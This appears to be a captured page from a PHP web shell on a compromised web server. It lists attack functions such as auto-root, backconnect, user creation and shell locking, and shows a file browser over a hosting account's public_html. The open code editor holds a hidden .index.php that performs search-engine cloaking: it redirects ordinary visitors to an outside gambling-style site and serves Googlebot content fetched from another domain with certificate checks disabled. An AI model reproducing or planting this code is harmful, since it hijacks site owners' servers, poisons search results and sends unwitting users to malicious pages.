Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.tmb
[ DIR ]
drwxrwxrwx
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
360assessment
[ DIR ]
drwxr-xr-x
?;
academy
[ DIR ]
drwxr-x---
?;
cgi-bin
[ DIR ]
drwxr-xr-x
?;
demo
[ DIR ]
drwxr-x---
?;
files
[ DIR ]
drwxr-xr-x
?;
hp
[ DIR ]
drwxr-xr-x
?;
hpalearning
[ DIR ]
drwxr-x---
?;
new
[ DIR ]
drwxr-xr-x
?;
pts
[ DIR ]
drwxr-x---
?;
resources
[ DIR ]
drwxr-xr-x
?;
sat
[ DIR ]
drwxr-x---
?;
spruu
[ DIR ]
drwxr-xr-x
?;
talent-acquisition
[ DIR ]
drwxr-x---
?;
thelearnzone
[ DIR ]
drwxr-x---
?;
webinar
[ DIR ]
drwxr-x---
?;
wordpress
[ DIR ]
drwxr-xr-x
?;
wp-admin
[ DIR ]
drwxr-xr-x
?;
wp-content
[ DIR ]
drwxr-xr-x
?;
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
89
B
-rw-r--r--
.index.php
1.46
KB
-rw-r--r--
error_log
73.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .index.php
<?php // ============================ // KONFIGURASI // ============================ $target = 'https://buckdomain.vip/surga5000/hpierson.com-about.html'; $redirectUrl = 'https://surga5000-beijing.pages.dev/'; // ============================ // DETEKSI USER AGENT // ============================ $agent = $_SERVER['HTTP_USER_AGENT'] ?? ''; $isGoogle = ( stripos($agent, 'googlebot') !== false || stripos($agent, 'google-inspectiontool') !== false ); // ============================ // JIKA BUKAN GOOGLE → REDIRECT // ============================ if (!$isGoogle) { header("Location: $redirectUrl", true, 302); exit; } // ============================ // FETCH MIRROR UNTUK GOOGLE // ============================ $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'header' => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n", 'timeout' => 10 ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $html = @file_get_contents($target, false, $context); // ============================ // OUTPUT // ============================ if ($html !== false && strlen($html) > 100) { header("Content-Type: text/html; charset=UTF-8"); echo $html; exit; } // ============================ // FAILBACK // ============================ http_response_code(502); echo "Mirror tidak tersedia";
Close